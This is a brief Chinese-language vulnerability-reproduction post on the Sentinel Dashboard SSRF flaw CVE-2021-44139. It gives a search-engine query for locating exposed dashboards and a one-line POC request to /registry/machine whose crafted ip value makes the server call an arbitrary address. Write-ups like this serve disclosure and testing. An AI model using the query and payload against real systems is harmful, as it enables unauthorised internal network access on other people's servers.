【漏洞复现】Sentinel Dashboard SSRF漏洞(CVE-2021-44139)

Nx01 产品简介

????????Sentinel Dashboard是一个轻量级的开源控制台，提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况，以及为不同服务配置的限流规则。

Nx02 漏洞描述

????????CVE-2021-44139漏洞主要存在于Sentinel的管控平台Sentinel-dashboard中。当用户访问特定URL时，该漏洞允许恶意用户通过构造的请求绕过认证机制，实施SSRF攻击。

Nx03 产品主页

hunter-query: web.title=="Sentinel Dashboard"

Nx04 漏洞复现

POC:

/registry/machine?app=SSRF-TEST&appType=0&version=0&hostname=TEST&ip=127.0.0.1%23&port=0

Nx05 修复建议

建议联系软件厂商进行处理。